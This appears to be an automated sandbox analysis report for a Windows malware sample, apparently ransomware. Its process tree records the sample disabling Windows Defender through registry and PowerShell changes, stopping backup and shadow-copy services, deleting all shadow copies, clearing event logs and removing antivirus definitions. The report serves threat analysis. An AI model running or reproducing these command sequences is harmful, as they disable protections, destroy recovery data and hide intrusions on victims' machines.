2596 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 2596 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 2596 wrote to memory of 1256 2596 net.exe net1.exe PID 2596 wrote to memory of 1256 2596 net.exe net1.exe PID 2596 wrote to memory of 1256 2596 net.exe net1.exe PID 3484 wrote to memory of 3548 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 3548 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 3548 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3548 wrote to memory of 2220 3548 net.exe net1.exe PID 3548 wrote to memory of 2220 3548 net.exe net1.exe PID 3548 wrote to memory of 2220 3548 net.exe net1.exe PID 3484 wrote to memory of 716 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 716 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 716 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 716 wrote to memory of 1440 716 net.exe net1.exe PID 716 wrote to memory of 1440 716 net.exe net1.exe PID 716 wrote to memory of 1440 716 net.exe net1.exe PID 3484 wrote to memory of 988 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe sc.exe PID 3484 wrote to memory of 988 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe sc.exe PID 3484 wrote to memory of 988 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe sc.exe PID 3484 wrote to memory of 1296 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe sc.exe PID 3484 wrote to memory of 1296 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe sc.exe PID 3484 wrote to memory of 1296 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe sc.exe PID 3484 wrote to memory of 1476 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe sc.exe PID 3484 wrote to memory of 1476 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe sc.exe PID 3484 wrote to memory of 1476 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe sc.exe PID 3484 wrote to memory of 1732 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:980
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:540
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:3184
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:3576
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:2924
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1408
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1256
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2220
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_12e21" /y2⤵
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12e21" /y3⤵PID:1440
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:988
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1296
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1476
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1732
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:4076
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:2056
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2508
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2864
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_12e21" start= disabled2⤵PID:3392
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1380
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2460
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3248
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1504
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2372
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1456
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:3168
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:928
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1104
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:540
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:4036
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3708
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3912
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3456
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:612
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1068
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:516
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1244
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1488
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2428
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2516
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1680
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1808
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2296
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3088 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3252 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1384 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2148
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3836
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2216
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3820
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:388 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:980
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3500 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3104 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2116
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1852 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2424
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1588
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:752
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5
fb44fe9383f6343a0156b34f4330ea68
SHA1d8d431b400c96d4875538ddd005249827d285dd6
SHA256e5e1663f8030537f920c75460631d7bbfc70c5ecbfc91a711e2a8756bcc1cf2e
SHA512e80ea3407953d5a25c513018b98593225b0e3e78b19d586d81d7e24ec16c95b79b46261e035083f4db8b7409760d87a8ba268b96add55098fa82a5624f9964a5